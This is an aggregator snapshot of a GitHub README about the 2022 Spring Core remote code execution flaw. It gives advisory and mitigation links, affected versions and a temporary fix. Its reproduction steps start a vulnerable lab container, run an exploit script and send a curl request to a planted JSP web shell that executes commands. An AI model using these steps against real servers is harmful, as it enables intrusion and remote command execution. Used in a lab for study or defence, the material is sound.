GitHub - craig/SpringCore0day: SpringCore0day from https://share.vx-underground....
source link: https://github.com/craig/SpringCore0day
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Information
https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://github.com/tweedge/springcore-0day-en
How to reproduce
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29
python3 ./exp.py --url http://192.168.0.11:8082
curl --output - "http://192.168.0.11:8082/tomcatwar.jsp?pwd=j&cmd=id"
Mitigations
https://github.com/blindpirate/spring-rce-2022-03-hotfix (untested)
https://www.praetorian.com/blog/spring-core-jdk9-rce/
Spring Core RCE
After Spring Cloud, on 3.29, another major Spring vulnerability was reported online: Spring Core RCE
(Note from craig: Spring Cloud exploit here: https://github.com/hktalent/spring-spel-0day-poc)
coded poc in circulation
** currently exp has been uploaded exp.py **
The official Spring patch is also in active production
Link to patches in production for Spring
The vulnerability affects
- jdk version 9 and above
- using Spring Framework or derivative frameworks
Vulnerability Fix Recommendations
Currently, Spring has not released a patch, so we recommend lowering the jdk version as a temporary solution.
Translated with www.DeepL.com/Translator (free version)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK